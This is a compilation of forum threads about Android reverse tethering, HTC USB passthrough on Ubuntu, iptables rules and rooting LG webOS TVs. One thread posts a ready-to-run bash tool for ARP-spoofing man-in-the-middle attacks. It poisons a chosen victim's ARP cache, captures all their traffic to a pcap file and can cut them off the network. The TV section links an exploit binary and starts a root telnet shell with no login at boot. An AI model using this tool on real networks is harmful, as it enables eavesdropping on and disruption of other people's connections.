Reverse tethering.. it works but no DNS! - General Questions and Answers

I've a Samsung S5 with CM12.1 + FakeWifi (Xposed).
I use the following script to reverse tether with ubuntu.
Code:
#!/bin/bash
ADB="adb"
# We need root on the host to mess with networking
if [[ $(whoami) != "root" ]]; then
echo "You must be root to run this script!"
exit 1
fi;
# We need root on the device to mess with networking
$ADB -d root
# Keep NetworkManager from messing with the adapter
grep 'usb0 inet manual' /etc/network/interfaces
if [ ! $? ]; then
echo 'Configuring usb0 for manual control'
echo 'iface usb0 inet manual' >> /etc/network/interfaces
restart network-manager
fi
echo 'Setting up usb networking on device'
$ADB -d shell 'ip addr add 192.168.200.2/30 dev rndis0;\
ip link set rndis0 up; \
ip route delete default; \
ip route add default via 192.168.200.1; \
setprop net.dns1 192.168.200.1'
echo 'Setting up usb interface on the host'
ip addr flush dev usb0
ip addr add 192.168.200.1/30 dev usb0
ip link set usb0 up
# Turn off the firewall if one is active
echo 'Checking for ufw firewall'
which ufw && ufw status || ufw disable
echo 'Enabling NAT and IP Forwarding'
# Start forwarding and nat (use existing default gw)
iptables -F -t nat
iptables -A POSTROUTING -t nat -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 'Starting dnsmasq'
dnsmasq --interface=usb0 --no-dhcp-interface=usb0
echo 'Connection is active! Press any key to shutdown.'
read
echo 'Attempting to shut down reverse tethering'
killall dnsmasq
ip link set usb0 down
iptables -F -t nat
echo 0 > /proc/sys/net/ipv4/ip_forward
echo 'Disabling usb networking on host'
$ADB shell ip route delete default
echo 'Disable and re-enable Wifi to return the device to normal'
Now the problem is that if I ping a public IP it works, but if I ping or curl the corresponding domain it fails "unknown host", "could not resolve".
What the heck should I do in order to make DNS working?
Thanks a lot for your help

Tsktsk said:
I've a Samsung S5 with CM12.1 + FakeWifi (Xposed).
I use the following script to reverse tether with ubuntu.
Code:
#!/bin/bash
ADB="adb"
# We need root on the host to mess with networking
if [[ $(whoami) != "root" ]]; then
echo "You must be root to run this script!"
exit 1
fi;
# We need root on the device to mess with networking
$ADB -d root
# Keep NetworkManager from messing with the adapter
grep 'usb0 inet manual' /etc/network/interfaces
if [ ! $? ]; then
echo 'Configuring usb0 for manual control'
echo 'iface usb0 inet manual' >> /etc/network/interfaces
restart network-manager
fi
echo 'Setting up usb networking on device'
$ADB -d shell 'ip addr add 192.168.200.2/30 dev rndis0;\
ip link set rndis0 up; \
ip route delete default; \
ip route add default via 192.168.200.1; \
setprop net.dns1 192.168.200.1'
echo 'Setting up usb interface on the host'
ip addr flush dev usb0
ip addr add 192.168.200.1/30 dev usb0
ip link set usb0 up
# Turn off the firewall if one is active
echo 'Checking for ufw firewall'
which ufw && ufw status || ufw disable
echo 'Enabling NAT and IP Forwarding'
# Start forwarding and nat (use existing default gw)
iptables -F -t nat
iptables -A POSTROUTING -t nat -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 'Starting dnsmasq'
dnsmasq --interface=usb0 --no-dhcp-interface=usb0
echo 'Connection is active! Press any key to shutdown.'
read
echo 'Attempting to shut down reverse tethering'
killall dnsmasq
ip link set usb0 down
iptables -F -t nat
echo 0 > /proc/sys/net/ipv4/ip_forward
echo 'Disabling usb networking on host'
$ADB shell ip route delete default
echo 'Disable and re-enable Wifi to return the device to normal'
Now the problem is that if I ping a public IP it works, but if I ping or curl the corresponding domain it fails "unknown host", "could not resolve".
What the heck should I do in order to make DNS working?
Thanks a lot for your help
Click to expand...
Click to collapse
Hi! Unfortunately, I have no idea on how to fix these issues, but if you'd be willing to try a different reverse tethering solution, you might want to try ReverseTethering NoRoot, an app I have developed. I have opened a dedicated thread over here: http://forum.xda-developers.com/android/apps-games/app-reversetethering-noroot-t3316716

Tsktsk said:
I've a Samsung S5 with CM12.1 + FakeWifi (Xposed).
I use the following script to reverse tether with ubuntu.
Code:
#!/bin/bash
ADB="adb"
# We need root on the host to mess with networking
if [[ $(whoami) != "root" ]]; then
echo "You must be root to run this script!"
exit 1
fi;
# We need root on the device to mess with networking
$ADB -d root
# Keep NetworkManager from messing with the adapter
grep 'usb0 inet manual' /etc/network/interfaces
if [ ! $? ]; then
echo 'Configuring usb0 for manual control'
echo 'iface usb0 inet manual' >> /etc/network/interfaces
restart network-manager
fi
echo 'Setting up usb networking on device'
$ADB -d shell 'ip addr add 192.168.200.2/30 dev rndis0;\
ip link set rndis0 up; \
ip route delete default; \
ip route add default via 192.168.200.1; \
setprop net.dns1 192.168.200.1'
echo 'Setting up usb interface on the host'
ip addr flush dev usb0
ip addr add 192.168.200.1/30 dev usb0
ip link set usb0 up
# Turn off the firewall if one is active
echo 'Checking for ufw firewall'
which ufw && ufw status || ufw disable
echo 'Enabling NAT and IP Forwarding'
# Start forwarding and nat (use existing default gw)
iptables -F -t nat
iptables -A POSTROUTING -t nat -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 'Starting dnsmasq'
dnsmasq --interface=usb0 --no-dhcp-interface=usb0
echo 'Connection is active! Press any key to shutdown.'
read
echo 'Attempting to shut down reverse tethering'
killall dnsmasq
ip link set usb0 down
iptables -F -t nat
echo 0 > /proc/sys/net/ipv4/ip_forward
echo 'Disabling usb networking on host'
$ADB shell ip route delete default
echo 'Disable and re-enable Wifi to return the device to normal'
Now the problem is that if I ping a public IP it works, but if I ping or curl the corresponding domain it fails "unknown host", "could not resolve".
What the heck should I do in order to make DNS working?
Thanks a lot for your help
Click to expand...
Click to collapse
Hi did you end up resolving this issue? I have the exact same problem. Can ping any site but DNS lookup fails. Then I installed DNSsetter app which allows me to change the dns server. Now I can do DNS lookups and it resolves correctly but none of the apps do not appear to be aware of the fact that the phone is using reverse USB tethering.

Related

[Q] Internet passthrough on Ubuntu

Hi guys,
I want to use my PC running on Ubuntu 12.04 64Bit to access the internet.
Usually in Windows i use the HTC tool.
my phone is not rooted.
thanks for help
??
39 views, 0 reply !!!!
Coz maybe the ones who viewed the thread didn't know a solution hence not answered
May be someone who uses Ubuntu world know...
Most of us user windows...
Sent from a Desire S waiting for Kernel 3. WAKE UP HTC!!!!
if u hv HTC sense on ur device, just tick the INTERNET PASS THROUGH option from the notification tab
and the system will do the rest
cheers
check out screenshot below
thanks for your replies
lynxnoon : yes I'v tried to do that, it will be connected to the PC but without internet connection.
ensure the adapters (esp the wired) are updated online and then try again.
Also ensure theres is pass through connection on ur fone and then try to browse with the in-built browser.
If all these still doesnt work then u have to find out if the internet service provider alllows tethering or the modem u r using.
cheers
Rabih-Sy said:
Hi guys,
I want to use my PC running on Ubuntu 12.04 64Bit to access the internet.
Usually in Windows i use the HTC tool.
my phone is not rooted.
thanks for help
Click to expand...
Click to collapse
When I connect my phone and choose internet passthrough, the phone chooses ip address in the 192.168.99.0/24. If yours creates a different subnet you will have to change below accordingly.
I hope this solves your problem.
Edit /etc/rc.local sudo nano /etc/rc.local and add the following:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
#forward all dns queries from usb0 to google's dns server
iptables -t nat -I PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to 8.8.8.8
then at terminal type:
sudo /etc/rc.local
that will get you connectivity, but it will be short lived because htc is stupid and will disconnect if it doesn't detect the winblows htc software crap.
So you will need to fake it out. Turns out the phone is listening for htc software on port 6000 for 00 02 00 00 hex.
first you have to find the ip address of your phone (if arp doesn't work or you get command not found, you probably need to sudo arp):
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
then you tell the phone that htc software is listening:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
To make that automagic each time us a script. Call it htcfaker or whatever:
#!/bin/bash
while :; do
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
while [ -z $phoneip ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
while [ "$phoneip" != "" ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
done
Then in your startup applications, point to that script.
Hope it helps!
I'm using unrooted HTC Sensation XE and Ubuntu 12.04 64-Bits, with these scripts Internet Pass Through works beautifully!:laugh::good:
haz3lnut said:
When I connect my phone and choose internet passthrough, the phone chooses ip address in the 192.168.99.0/24. If yours creates a different subnet you will have to change below accordingly.
I hope this solves your problem.
Edit /etc/rc.local sudo nano /etc/rc.local and add the following:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
#forward all dns queries from usb0 to google's dns server
iptables -t nat -I PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to 8.8.8.8
then at terminal type:
sudo /etc/rc.local
that will get you connectivity, but it will be short lived because htc is stupid and will disconnect if it doesn't detect the winblows htc software crap.
So you will need to fake it out. Turns out the phone is listening for htc software on port 6000 for 00 02 00 00 hex.
first you have to find the ip address of your phone (if arp doesn't work or you get command not found, you probably need to sudo arp):
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
then you tell the phone that htc software is listening:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
To make that automagic each time us a script. Call it htcfaker or whatever:
#!/bin/bash
while :; do
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
while [ -z $phoneip ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
while [ "$phoneip" != "" ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
done
Then in your startup applications, point to that script.
Hope it helps!
Click to expand...
Click to collapse
Did anyone experienced the problem that this stopped working after a day or so?
When I plug into the phone now it just wont give a ipv4 address therefore theres nothing to re-route through the pc?
Mine still working without any problem after 2 months. I can only suggest you to check 2 things:
Ensure your /etc/rc.local file is not changed due to any Ubuntu update
You have to run the "htcfaker" script in Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
fruity12 said:
Did anyone experienced the problem that this stopped working after a day or so?
When I plug into the phone now it just wont give a ipv4 address therefore theres nothing to re-route through the pc?
Click to expand...
Click to collapse
iptables table 'nat' not found while running sudo /etc/rc.local script
ykkhern said:
Mine still working without any problem after 2 months. I can only suggest you to check 2 things:
Ensure your /etc/rc.local file is not changed due to any Ubuntu update
You have to run the "htcfaker" script in Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
Click to expand...
Click to collapse
I have updated /etc/rc.local file but I'm getting below error what needs to be done? I'm newbie to Linux, neverthless tried to look into many forums but couldn't get it resolved.. Please help !!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help !!
anvyal said:
I have updated /etc/rc.local file but I'm getting below error what needs to be done? I'm newbie to Linux, neverthless tried to look into many forums but couldn't get it resolved.. Please help !!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help !!
Click to expand...
Click to collapse
Please check the following line in your /etc/rc.local:
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
You have to change the IP subnet (highlighted in red font above) to match your phone's IP address. If your phone use 192.168.1.2 for example, then you'll have to change the IP subnet to 192.168.1.0/24.
To find your phone's IP address, first connect your phone to your PC in USB Tethering mode. Then on your PC side open a Terminal and issue the command "arp" (without the quotes) which shall give you the IP address of your phone.
Good luck!:laugh:
Script update required for recent phones?
This script didn't work for me on my M8 - the Sync hex data seems to have grown, and just passing the \x00\x02\x00\x00 string caused the pass through to immediately disconnect with failure message "Either you do not have the latest version of HTC Sync Manager installed, or another phone is already using Internet pass-through on your PC".
Changing the line in the script as below fixes it:
Code:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
Code:
echo -n -e "\x00\x02\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00" | nc $phoneip 6000 > /dev/null
I got this from vc0528.tumblr.com/post/71168788542/simulate-htc-sync-manager-via-usb-on-linux-os, which also has the alternative Perl script, which works a treat too:
Code:
#!/usr/bin/perl
use IO::Socket::INET;
#6000/tcp open X11
do{
open IN,”/proc/net/arp”; @arp=<IN>; close IN;
@d=grep ! /00:00:00:00:00:00/,grep /0x2.*usb0/,@arp;
} until($d[0]);
$_=$d[0]; s/\ .*//; chomp; print “sock:\t$_\n”;
my $sock = IO::Socket::INET->new(PeerAddr => $_ , PeerPort => 6000, Type=>SOCK_STREAM, Proto=>”tcp”) or die “Can not create socket [email protected]\n”;
print $sock “\x00\x02\x00\x00”;
print $sock “\x00\x03\x00\x00”;
print $sock “\x00\x05\x00\x00”;
close $sock;
Finally, if it helps anyone, I was wanting to set up a wifi range extender and so my IPtables was:
Code:
-A FORWARD -i wlan1 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i usb0 -o wlan1 -j ACCEPT

[HOWTO] MITM ARPspoofing automatic script ARM/BASH

Hello everybody
Sorry by advance for my english, i'm french.
My main phone is broken so i have a old galaxy mini (android gingerbread ) for replacement... and i want to use this for some MiTM spoofing and information gathering but app play store are not compatible or buggy for me.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
The script work for me but maybe the method to get local IP/ IP GATEWAY will change for phone or android version
I post the script here maybe it way make idea for someone
So i use nmap ARM binary from nmap website ( nmap/nping ) to create a little script (182 lines) to automated MiTM it's very lightweight and easy to use.
Requirement
rooted phone
busybox
tcpdump
bash
Features
MiTM arp spoofing ( Restore original gateway mac after attack )
MiTM arp spoofing with tcpdump log data in pcap file ( Restore original gateway mac after attack )
Netcut replace mac gateway by another fake mac address
Installation binaries
Code:
mkdir -p /sdcard/opt
cd /sdcard/opt
#get binary from nmap website
wget "http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2"
tar xvjf nmap-6.46-android-arm-bin.tar.bz2
#Installation to /system/xbin
cd nmap-6.46
mount -o remount,rw /system
cp -v bin/nmap /system/xbin
cp -v bin/nping /system/xbin
#Restore /system permission
mount -o ro,remount,ro /system
Tools mitm.bash
Copy the content below script to /sdcard/mitm.bash
And run bash /sdcard/mitm.bash and enjoy it
or copy from web with :
Code:
wget -q http://www.web-point-zero.fr/mitm.bash -O /sdcard/mitm.bash && (echo "All good run : bash /sdcard/mitm.bash" ) || (echo "Error to download file ")
Code:
#!/bin/bash
echo "*** Tools create by c0derz67 from forum.xda-developers.com ****";
echo -e "\n\n";
TMP_DIRECTORY="/sdcard/_nettools_$RANDOM"; # maybe change by our sdcard directory
MAIN_INTERFACE="wlan0" # change with your interface name
mkdir -p "$TMP_DIRECTORY" || (echo "Can't create $TMP_DIRECTORY";exit;);
cd $TMP_DIRECTORY || (echo "Can't chdir to $TMP_DIRECTORY";exit;);
trap "echo \"Bye bye :) remove $TMP_DIRECTORY\";rm -r $TMP_DIRECTORY;exit;" 0 1 2 3 15;
echo "[*] GET GATEWAY "
GATEWAY=$(ip route show | grep $MAIN_INTERFACE | grep -o -E "via.*dev" | cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> GATEWAY IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] GET ADRESS "
MY_ADDRESS=$(ip route show | egrep -o "src .*"|cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> MY_ADDRESS IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] Get Mac address : ";
MY_MAC=$(busybox ifconfig $MAIN_INTERFACE | grep -E -o "HWaddr .*"|cut -d ' ' -f2);
if [ -n "$MY_MAC" ]; then
echo " -> Mac address is : $MY_MAC"
else
echo "ENABLE TO GET mac ADDR"
exit;
fi;
GATEWAY_FIRST_PART_IP_1=$(echo $GATEWAY | cut -d '.' -f1);
GATEWAY_FIRST_PART_IP_2=$(echo $GATEWAY | cut -d '.' -f2);
GATEWAY_FIRST_PART_IP_3=$(echo $GATEWAY | cut -d '.' -f3);
GATEWAY_FIRST_PART_IP_4=$(echo $GATEWAY | cut -d '.' -f4);
MY_ADDRESS_FIRST_PART_IP_1=$(echo $MY_ADDRESS | cut -d '.' -f1);
MY_ADDRESS_FIRST_PART_IP_2=$(echo $MY_ADDRESS | cut -d '.' -f2);
MY_ADDRESS_FIRST_PART_IP_3=$(echo $MY_ADDRESS | cut -d '.' -f3);
MY_ADDRESS_FIRST_PART_IP_4=$(echo $MY_ADDRESS | cut -d '.' -f4);
SCAN_IP_RANGE="$MY_ADDRESS_FIRST_PART_IP_1.$MY_ADDRESS_FIRST_PART_IP_2.$MY_ADDRESS_FIRST_PART_IP_3.1-255";
echo "[*] Scan : $SCAN_IP_RANGE "
nmap -n -v -sP "$SCAN_IP_RANGE" | grep -v down
echo -e "\n\n"
echo "[*] DEVICE(S) connected to network : ";
echo -e "\n";
mkdir ip || (echo "Can't create IP";exit);
GATEWAY_MAC="";
counter=0;
arp -n -a | grep -v incomplete > ARP_RESULT.txt
already_set=0;
while((1));
do
i=0;
while read line;do
i=$(($i+1));
THIS_IP=$(echo $line | egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" );
THIS_MAC=$(echo $line | egrep -o ".{2}:.{2}:.{2}:.{2}:.{2}:.{2}" )
if [ "$THIS_IP" = "$GATEWAY" ];then
GATEWAY_MAC=$THIS_MAC;
fi;
#echo "[$i] CURRENT MAC : $THIS_MAC ";
#echo "[$i] CURRENT IP : $THIS_IP"
echo "$i ) $THIS_IP ( $THIS_MAC ) "
if [ "$already_set" -eq 0 ]; then
mkdir $i;
echo $THIS_MAC > $i/MAC
echo $THIS_IP > $i/IP
fi;
done < ARP_RESULT.txt;
already_set=1;
echo -e "\n"
read -n 1 -p "[*] Select target ( 1-$i ) : " number_victim;
echo "";
if [ ! -d $number_victim ];then
echo "$number_victim is not a good target";
continue;
fi
TARGET_MAC=$(cat $number_victim/MAC );
TARGET_IP=$(cat $number_victim/IP );
echo -e "\n\n"
echo "[*] Select attack : ";
echo -e "\n"
echo "1) Arp Spoofing MITM (Catch and Redirect trafic to gateway) ";
echo "2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "3) Netcut Arp Spoofing replace gateway mac to invalid mac ";
echo -e "\n"
read -n 1 -p "[*] Attack type : " number_attack;
case $number_attack in
1)
clear
echo "[*] Start 1) Arp Spoofing MITM (Catch and Redirect trafic to gateway)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
read -n 1
GET_PID=$!
echo -e "\n\n";
echo "********* STOP ATTACK *********";
kill -9 $GET_PID;
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
2)
clear
echo "[*] Start 2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 >log_nping.txt &
PID_nping=$!
sleep 5s;
echo "Let's see what nping say log_nping.txt : "
echo -e "\n\n";
cat log_nping.txt
echo -e "\n\n";
echo "[*] Arp spoofing (nping) running in background see $TMP_DIRECTORY/log_nping.txt for detail"
echo "[*] Running tcpdump exclude $MY_ADDRESS packet";
tcpdump -i $MAIN_INTERFACE -s0 -v -w /sdcard/dump.pcap &
PID_tcpdump=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
3)
clear
echo "[*] Start 3) Netcut Arp Spoofing replace gateway mac to invalid mac";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac cc:cc:cc:cc:cc:cc --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
PID_nping=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
esac
done;
done;
#ARP POISOING help
#nping --arp --arp-type ARP-reply --arp-sender-ip (GATEWAY IP) --arp-sender-mac (ATTACKER IP ) --dest-mac (MAC VICTIME) (IP VICTIM) -c 999999

[Completed] How to OUTPUT only cellular data ... [remove this one please, moved my question]

Asked this question in now in General -> Networking as per advice from user Art Vandalay
volleb said:
Goal: Only allow outgoing cellular data to specific DNS servers and a specific webserver using cellular mode on rooted android device.
Android phone #1: VkWorld F1 (Chipset. MT6580) running Android 5.1
Android phone #2: HUAWEI Y560-L01 running Android 5.1
Active interfaces on Android #1 when cellular mode is on.
Code:
lo UP 127.0.0.1/8
ccmni0 UP x.x.x.x/x
Active interfaces on Android #2 when cellular mode is on.
Code:
lo UP 127.0.0.1/8
rmnet_data0 UP x.x.x.x/x
This is my current simple iptables for testing on Android #1 and #2
Code:
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -d 8.8.8.8 -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT //DNS
-A OUTPUT -d x.x.x.x -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT //webserver
-A OUTPUT -j DROP
These iptables rules works on Android device #2 or any Android phone that has 'rmnet' interface (from my own testing).
These iptables rules DO NOT work on Android device #1 or any Android phone that has 'ccmni' interface (from my own testing)
And if I add or change in my android #1 to
Code:
-A OUTPUT -o ccmni0 -d x.x.x.x -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT
it can NOT still contact the destination ip.
However if I add this line before the last -j DROP rule it works
Code:
iptables -A OUTPUT -o ccmni0 -j ACCEPT
but this allows ccmni interface to talk freely to any website and makes my dns and webserver rule pointless.
Once again:
Devices rmnet interfaces = rules works.
Devices with ccmni interfaces = rules do not work.
Click to expand...
Click to collapse
Hi,
Try posting your query in:
> General discussion > Networking
Experts there may be able to help you.
Good luck

Rooting the webOS TV

pivotce.com informs that instructions have been published on gaining root access to a webOS TV. This is much harder than on the old phones and tablets. When this was done on legacy webOS, there was a wave of enhancements and tweaks made available to phone users from webOS Internals and other developers.
The instructions can be found on the Russian webOS forums here: webos-forums.ru/topic4650.html (English Translation via Google).
As the thread itself notes, this creates the possibility of fiddling with your TV in a way that may turn it into a large, thin brick and will almost certainly invalidate your warranty. The general user should stay well clear of this.
pivotCE published this for information only and recommend leaving investigations to those who know what they are doing or who can afford to wreck expensive television sets. We will watch to see if anything interesting emerges from this development.
+
Detailed analysis of the root access method described above:
forums.webosnation.com/lg-webos-tv/331754-pivotce-seems-webos-tv-has-been-rooted.html#post3450911
Hello!
I'm from webos-forums.ru. I've root on TV for a while and can help you with translation or testing on LG webOS 1.4.
rooting
I could use your help rooting my lg 65uf6450-ua if you would. Thank you
Root webOS
Hodizzal said:
I could use your help rooting my lg 65uf6450-ua if you would. Thank you
Click to expand...
Click to collapse
1. You need to install Developer Mode App and export private ssh-key with CLI (webostv.developer.lge.com/develop/app-test)
2. Convert private ssh-key with puttygen [import key <your private ssh-key>, then save private key]
3. Download exploit (zalil.su/6937580), then connect with TV User: prisoner, [<ip-tv>:9922] + private-key with WinSCP (or other SCP-client), upload to /media/developer on TV and rename it to root.
on linux
Code:
ssh -i <your private ssh-key> [email protected]<ip-tv> -p 9922 "/bin/sh -i"
4.
Code:
chmod +x root
Code:
./root
5. After try install any app from market go to LG App Store and try to install any app.
6. if third stage ok. the insert password 1111 as said.
7.
Code:
busybox chroot /proc/1/root
Code:
[email protected]tTV:/# id
Code:
uid=0(root) gid=0(root)........
I personally use Linux Subsystem on Windows 10 for all of this.
To install .ipk app:
Code:
ApplicationInstallerUtility -c install -p /tmp/<any-name>.ipk -u 0 -l /media/developer -d
Info about your linux kernel and TV firmware:
Code:
luna-send -n 1 -f luna://com.palm.systemservice/osInfo/query '{ "subscribe": false }'
Launch app:
Code:
luna-send -n 1 -f luna://com.webos.applicationManager/launch '{"id": "netflix"}'
All apps ID you can find with
Code:
luna-send -n 1 "palm://com.palm.applicationManager/listLaunchPoints" "{}"
or at a folder /media/cryptofs/apps/usr/palm/applications/<App ID>/appinfo.json
For permanent root access through telnet:
1)
Code:
[email protected]:/# mkdir -p /media/cryptofs/root/etc
2)
Code:
[email protected]:/# cp -r /etc/* /media/cryptofs/root/etc
3)
Code:
[email protected]:/# mount -o bind /media/cryptofs/root/etc /etc
4)
Code:
[email protected]:/# passwd root
Enter any new root password
5)
Code:
cp /media/cryptofs/apps/usr/palm/services/com.palmdts.devmode.service/start-devmode.sh /tmp/start-devmode.sh
6) Download with WinSCP start-devmode.sh and edit it locally.
You need to add at the beginning
Code:
mount -o bind /media/cryptofs/root/etc /etc
telnetd -l /sbin/sulogin &
Plus you can add the line to launch any App at start, e.g:
Code:
luna-send -n 1 -f luna://com.webos.applicationManager/launch '{"id": "netflix", "params":{}}'
And comment Dev Mode online check.
Here it's mine start-devmode.sh. It's for webOS 1.4. It can be different for other webOS versions:
Code:
#!/bin/sh
mount -o bind /media/cryptofs/root/etc /etc
telnetd -l /sbin/sulogin &
#luna-send -n 1 -f luna://com.webos.applicationManager/launch '{"id": "netflix", "params":{}}'
# FIXME: disable this to turn off script echo
set -x
# FIXME: disable this to stop script from bailing on error
# set -e
# TODO: Check upstart daemon/process tracking (do we need to change /etc/init/devmode.conf? start sshd as daemon?)
# set devmode ssh port here
SSH_PORT="9922"
# set arch:
ARCH="armv71"
grep -qs "qemux86" /etc/hostname && ARCH="i686"
# set directories
OPT_DEVMODE="/opt/devmode"
OPT_SSH="/opt/openssh"
DEVELOPER_HOME="/media/developer"
DEVMODE_SERVICE_DIR="/media/cryptofs/apps/usr/palm/services/com.palmdts.devmode.service"
CRYPTO_SSH="$DEVMODE_SERVICE_DIR/binaries-${ARCH}/opt/openssh"
CRYPTO_OPT="$DEVMODE_SERVICE_DIR/binaries-${ARCH}/opt"
if [ -s ${DEVMODE_SERVICE_DIR}/jail_app.conf ] ; then
mv ${DEVMODE_SERVICE_DIR}/jail_app.conf ${DEVELOPER_HOME}
mv ${DEVMODE_SERVICE_DIR}/jail_app.conf.sig ${DEVELOPER_HOME}
fi
if [ -r ${DEVMODE_SERVICE_DIR}/sessionToken ] ; then
mv -f ${DEVMODE_SERVICE_DIR}/sessionToken /var/luna/preferences/devmode_enabled
fi
# Make sure the ssh binaries are executable (in service directory)
if [ ! -x "${CRYPTO_SSH}/sbin/sshd" ] ; then
chmod ugo+x ${CRYPTO_SSH}/sbin/sshd ${CRYPTO_SSH}/bin/ssh* ${CRYPTO_SSH}/bin/scp* || true
chmod ugo+x ${CRYPTO_SSH}/bin/sftp ${CRYPTO_SSH}/lib/openssh/* || true
chmod ugo+x ${CRYPTO_OPT}/devmode/usr/bin/* || true
fi
# TODO: (later) Look for "re-init" flag to re-generate ssh key if requested by app (via devkey service)
# com.palm.service.devmode could have "resetKey" method to erase /var/lib/devmode/ssh/webos_rsa
# Kind of dangerous though, since new key will need to be fetched on the desktop (after reboot)...
# We could just require a hard-reset of the TV which should blow away /var/lib/devmode/ssh/...
# Initialize the developer (client) SSH key pair, if it doesn't already exist
if [ ! -e /var/lib/devmode/ssh/webos_rsa ] ; then
mkdir -p /var/lib/devmode/ssh
chmod 0700 /var/lib/devmode/ssh
# get FIRST six (UPPER-CASE, hex) characters of 40-char nduid from nyx-cmd
# NOTE: This MUST match passphrase as displayed in devmode app (main.js)!
